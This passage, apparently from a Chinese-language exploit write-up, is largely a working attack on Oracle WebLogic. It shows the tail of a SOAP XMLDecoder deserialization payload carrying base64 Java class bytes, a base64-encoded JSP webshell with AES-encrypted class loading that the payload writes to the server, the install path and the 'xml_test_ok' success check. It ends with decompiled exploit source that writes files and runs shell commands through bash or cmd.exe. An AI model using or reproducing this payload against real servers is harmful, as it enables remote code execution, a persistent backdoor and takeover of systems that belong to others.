eQABAAkAAABlAAQAAwAAABW7ADZZsgAPK7YAehJ+twCAsE0SR7AAAQAAABAAEQCDAAMAEQAAAA4AAwAAAC8AEQAwABIAMgASAAAAFgACAAAAFQAUABUAAAAAABUAhQCGAAEATwAAAAYAAVEHAIMAAgCHAH0AAQAJAAAAWwACAAMAAAALsgAPK7YAerBNAbAAAQAAAAcACACDAAMAEQAAAA4AAwAAADYACAA3AAkAOQASAAAAFgACAAAACwAUABUAAAAAAAsAhQCGAAEATwAAAAYAAUgHAIMAAgCIAIkAAQAJAAAAdAABAAMAAAAVAUwqtwAYTSzGAAsstgActgCKTCuwAAAAAwARAAAAFgAFAAAAPQACAD4ABwA/AAsAQAATAEIAEgAAACAAAwAAABUAFAAVAAAAAgATAI0AjgABAAcADgBLAEwAAgBPAAAACwAB/QATBwCPBwAdAAEAkQAIAAIAkgAAAAQAAQBJAAkAAAA9AAIAAQAAAA8qtwCTtgCVKrcAmbYAm7EAAAACABEAAAAKAAIAAABGAA4ARwASAAAADAABAAAADwAUABUAAAABAJ8APQACAJIAAAAEAAEASQAJAAAARAACAAIAAAAMKrcAk7YAlSu2AJuxAAAAAgARAAAACgACAAAASgALAEsAEgAAABYAAgAAAAwAFAAVAAAAAAAMAIUAhgABAAEAoAA9AAIAkgAAAAQAAQBJAAkAAADiAAMABgAAAFIrEqG2AKNNLAMyTiosBDK3AKc6BBKpLbYAqpoAG7sAKFkqtwCZuAA1twA7GQS2AEC2AEQ6BCosBTK3AK46BRkFGQS4ALAqtwCTtgCVErW2AJuxAAAAAwARAAAAJgAJAAAATgAHAFAACwBRABQAUgAdAFQANQBWAD4AVwBFAFgAUQBZABIAAAA+AAYAAABSABQAFQAAAAAAUgC3AIYAAQAHAEsAuAC5AAIACwBHALoAhgADABQAPgCRAIYABAA+ABQAuwC8AAUATwAAAA4AAf4ANQcAvQcANgcANgABAL4APQACAJIAAAAEAAEASQAJAAABhgADAAgAAACmKiu3AKdMK8YADSu2AL+2AMKaAAYSxkwEPRLIuADKTi3GABEttgDPEtK2ANSZAAUDPbsA2Fm3ANo6BByZAB0ZBBLbtgDdVxkEEuC2AN1XGQQrtgDdV6cAGhkEEuK2AN1XGQQS5LYA3VcZBCu2AN1XuwDmWRkEtwDoOgUZBQS2AOtXGQW2AO86Biq3AJM6BxkHtgDzGQa2APe2AP0qtwCTtgCVtgEDsQAAAAMAEQAAAF4AFwAAAF0ABgBeABQAXwAXAGEAGQBiAB8AYwAvAGQAMQBnADoAaAA+AGkARgBqAE4AawBVAGwAWABtAGAAbgBoAG8AbwBxAHoAcgCBAHMAiAB0AI4AdQCbAHYApQB3ABIAAABSAAgAAACmABQAFQAAAAAApgEGAIYAAQAZAI0BBwEIAAIAHwCHAQkAhgADADoAbAEKAQsABAB6ACwBDAENAAUAiAAeAQ4BDwAGAI4AGACNAI4ABwBPAAAAEgAFFAL9ABkBBwA2/AAmBwDYFgABARAAAAACARE=</string>
  16. </void>
  17. </void>
  18. <void class="org.mozilla.classfile.DefiningClassLoader">
  19.                     <void method="defineClass">
  20.                         <string>com.supeream.exploits.XmlAPITest</string>
  21.                         <object idref="byte_arr"></object>
  22.                         <void method="newInstance">
  23.                             <void method="up" id="proc">
  24.                                 <string>file:NUt2TEM3LmpzcA==:PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IFN0cmluZyBwYXNzPSJwYXNzIjsgU3RyaW5nIG1kNT1tZDUocGFzcyt4Yyk7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0gcHVibGljIHN0YXRpYyBTdHJpbmcgbWQ1KFN0cmluZyBzKSB7U3RyaW5nIHJldCA9IG51bGw7dHJ5IHtqYXZhLnNlY3VyaXR5Lk1lc3NhZ2VEaWdlc3QgbTttID0gamF2YS5zZWN1cml0eS5NZXNzYWdlRGlnZXN0LmdldEluc3RhbmNlKCJNRDUiKTttLnVwZGF0ZShzLmdldEJ5dGVzKCksIDAsIHMubGVuZ3RoKCkpO3JldCA9IG5ldyBqYXZhLm1hdGguQmlnSW50ZWdlcigxLCBtLmRpZ2VzdCgpKS50b1N0cmluZygxNikudG9VcHBlckNhc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge31yZXR1cm4gcmV0OyB9IHB1YmxpYyBzdGF0aWMgU3RyaW5nIGJhc2U2NEVuY29kZShieXRlW10gYnMpIHRocm93cyBFeGNlcHRpb24ge0NsYXNzIGJhc2U2NDtTdHJpbmcgdmFsdWUgPSBudWxsO3RyeSB7YmFzZTY0PUNsYXNzLmZvck5hbWUoImphdmEudXRpbC5CYXNlNjQiKTtPYmplY3QgRW5jb2RlciA9IGJhc2U2NC5nZXRNZXRob2QoImdldEVuY29kZXIiLCBudWxsKS5pbnZva2UoYmFzZTY0LCBudWxsKTt2YWx1ZSA9IChTdHJpbmcpRW5jb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZW5jb2RlVG9TdHJpbmciLCBuZXcgQ2xhc3NbXSB7IGJ5dGVbXS5jbGFzcyB9KS5pbnZva2UoRW5jb2RlciwgbmV3IE9iamVjdFtdIHsgYnMgfSk7fSBjYXRjaCAoRXhjZXB0aW9uIGUpIHt0cnkgeyBiYXNlNjQ9Q2xhc3MuZm9yTmFtZSgic3VuLm1pc2MuQkFTRTY0RW5jb2RlciIpOyBPYmplY3QgRW5jb2RlciA9IGJhc2U2NC5uZXdJbnN0YW5jZSgpOyB2YWx1ZSA9IChTdHJpbmcpRW5jb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZW5jb2RlIiwgbmV3IENsYXNzW10geyBieXRlW10uY2xhc3MgfSkuaW52b2tlKEVuY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlMikge319cmV0dXJuIHZhbHVlOyB9IHB1YmxpYyBzdGF0aWMgYnl0ZVtdIGJhc2U2NERlY29kZShTdHJpbmcgYnMpIHRocm93cyBFeGNlcHRpb24ge0NsYXNzIGJhc2U2NDtieXRlW10gdmFsdWUgPSBudWxsO3RyeSB7YmFzZTY0PUNsYXNzLmZvck5hbWUoImphdmEudXRpbC5CYXNlNjQiKTtPYmplY3QgZGVjb2RlciA9IGJhc2U2NC5nZXRNZXRob2QoImdldERlY29kZXIiLCBudWxsKS5pbnZva2UoYmFzZTY0LCBudWxsKTt2YWx1ZSA9IChieXRlW10pZGVjb2Rlci5nZXRDbGFzcygpLmdldE1ldGhvZCgiZGVjb2RlIiwgbmV3IENsYXNzW10geyBTdHJpbmcuY2xhc3MgfSkuaW52b2tlKGRlY29kZXIsIG5ldyBPYmplY3RbXSB7IGJzIH0pO30gY2F0Y2ggKEV4Y2VwdGlvbiBlKSB7dHJ5IHsgYmFzZTY0PUNsYXNzLmZvck5hbWUoInN1bi5taXNjLkJBU0U2NERlY29kZXIiKTsgT2JqZWN0IGRlY29kZXIgPSBiYXNlNjQubmV3SW5zdGFuY2UoKTsgdmFsdWUgPSAoYnl0ZVtdKWRlY29kZXIuZ2V0Q2xhc3MoKS5nZXRNZXRob2QoImRlY29kZUJ1ZmZlciIsIG5ldyBDbGFzc1tdIHsgU3RyaW5nLmNsYXNzIH0pLmludm9rZShkZWNvZGVyLCBuZXcgT2JqZWN0W10geyBicyB9KTt9IGNhdGNoIChFeGNlcHRpb24gZTIpIHt9fXJldHVybiB2YWx1ZTsgfSU+PCV0cnl7Ynl0ZVtdIGRhdGE9YmFzZTY0RGVjb2RlKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKHBhc3MpKTtkYXRhPXgoZGF0YSwgZmFsc2UpO2lmIChzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpPT1udWxsKXtzZXNzaW9uLnNldEF0dHJpYnV0ZSgicGF5bG9hZCIsbmV3IFgodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLlEoZGF0YSkpO31lbHNle3JlcXVlc3Quc2V0QXR0cmlidXRlKCJwYXJhbWV0ZXJzIixkYXRhKTtqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSBhcnJPdXQ9bmV3IGphdmEuaW8uQnl0ZUFycmF5T3V0cHV0U3RyZWFtKCk7T2JqZWN0IGY9KChDbGFzcylzZXNzaW9uLmdldEF0dHJpYnV0ZSgicGF5bG9hZCIpKS5uZXdJbnN0YW5jZSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO3Jlc3BvbnNlLmdldFdyaXRlcigpLndyaXRlKG1kNS5zdWJzdHJpbmcoMCwxNikpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShiYXNlNjRFbmNvZGUoeChhcnJPdXQudG9CeXRlQXJyYXkoKSwgdHJ1ZSkpKTtyZXNwb25zZS5nZXRXcml0ZXIoKS53cml0ZShtZDUuc3Vic3RyaW5nKDE2KSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4=</string>
  25.                             </void>
  26.                         </void>
  27.                     </void>
  28.                 </void>
  29.             </java>
  30.         </work:WorkContext>
  31.     </soapenv:Header>
  32.     <soapenv:Body/>
  33. </soapenv:Envelope>
返回中出现 xml_test_ok 则说明上传成功 此路径会默认上传到下面这个绝对路径 
  1. C:\Oracle\Middleware\Oracle_Home2\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.wsat-endpoints-impl_12.1.3\8919zy\war

以下是base64反编译出来的源码

  1. //
  2. // Source code recreated from a .class file by IntelliJ IDEA
  3. // (powered by FernFlower decompiler)
  4. //
  6. package com.supeream.exploits;
  8. import java.io.IOException;
  9. import java.lang.reflect.Field;
  10. import java.util.ArrayList;
  11. import weblogic.servlet.internal.HttpConnectionHandler;
  12. import weblogic.servlet.internal.ServletResponseImpl;
  13. import weblogic.servlet.internal.WebAppServletContext;
  14. import weblogic.utils.FileUtils;
  15. import weblogic.utils.encoders.BASE64Decoder;
  16. import weblogic.work.ExecuteThread;
  17. import weblogic.work.WorkAdapter;
  19. public class XmlAPITest {
  20.     private static BASE64Decoder b = new BASE64Decoder();
  22.     public XmlAPITest() {
  23.     }
  25.     private String getPath() {
  26.         try {
  27.             HttpConnectionHandler httpConnectionHandler = this.getHttpConnectionHandler();
  28.             if (httpConnectionHandler != null) {
  29.                 WebAppServletContext webAppServletContext = httpConnectionHandler.getServletRequest().getContext();
  30.                 return webAppServletContext.getRootTempDir().getAbsolutePath() + "/war/";
  31.             }
  32.         } catch (Exception var3) {
  33.         }
  35.         return "";
  36.     }
  38.     private HttpConnectionHandler getHttpConnectionHandler() {
  39.         try {
  40.             ExecuteThread executeThread = (ExecuteThread)Thread.currentThread();
  41.             WorkAdapter workAdapter = executeThread.getCurrentWork();
  42.             Field field = workAdapter.getClass().getDeclaredField("connectionHandler");
  43.             if (field != null) {
  44.                 field.setAccessible(true);
  45.                 return (HttpConnectionHandler)field.get(workAdapter);
  46.             }
  47.         } catch (Exception var4) {
  48.         }
  50.         return null;
  51.     }
  53.     private String base64Decode(String str) {
  54.         try {
  55.             return new String(b.decodeBuffer(str), "UTF-8");
  56.         } catch (IOException var3) {
  57.             return "";
  58.         }
  59.     }
  61.     private byte[] base64DecodeByte(String str) {
  62.         try {
  63.             return b.decodeBuffer(str);
  64.         } catch (IOException var3) {
  65.             return null;
  66.         }
  67.     }
  69.     private ServletResponseImpl getServletResponse() {
  70.         ServletResponseImpl response = null;
  71.         HttpConnectionHandler httpConnectionHandler = this.getHttpConnectionHandler();
  72.         if (httpConnectionHandler != null) {
  73.             response = httpConnectionHandler.getServletRequest().getResponse();
  74.         }
  76.         return response;
  77.     }
  79.     public void path() throws Exception {
  80.         this.getServletResponse().getWriter().print(this.getPath());
  81.     }
  83.     public void print(String str) throws Exception {
  84.         this.getServletResponse().getWriter().print(str);
  85.     }
  87.     public void up(String bdata) throws Exception {
  88.         String[] datas = bdata.split(":");
  89.         String op = datas[0];
  90.         String path = this.base64Decode(datas[1]);
  91.         if (!"path".equals(op)) {
  92.             path = this.getPath() + path;
  93.         }
  95.         byte[] data = this.base64DecodeByte(datas[2]);
  96.         FileUtils.writeToFile(data, path);
  97.         this.getServletResponse().getWriter().print("xml_test_ok");
  98.     }
  100.     public void say(String cmd) throws Exception {
  101.         cmd = this.base64Decode(cmd);
  102.         if (cmd == null || cmd.trim().length() == 0) {
  103.             cmd = "whoami";
  104.         }
  106.         boolean isLinux = true;
  107.         String osTyp = System.getProperty("os.name");
  108.         if (osTyp != null && osTyp.toLowerCase().contains("win")) {
  109.             isLinux = false;
  110.         }
  112.         ArrayList cmds = new ArrayList();
  113.         if (isLinux) {
  114.             cmds.add("/bin/bash");
  115.             cmds.add("-c");
  116.             cmds.add(cmd);
  117.         } else {
  118.             cmds.add("cmd.exe");
  119.             cmds.add("/c");
  120.             cmds.add(cmd);
  121.         }
  123.         ProcessBuilder processBuilder = new ProcessBuilder(cmds);
  124.         processBuilder.redirectErrorStream(true);
  125.         Process proc = processBuilder.start();
  126.         ServletResponseImpl response = this.getServletResponse();
  127.         response.getServletOutputStream().writeStream(proc.getInputStream());
  128.         this.getServletResponse().getWriter().flush();
  129.     }
  130. }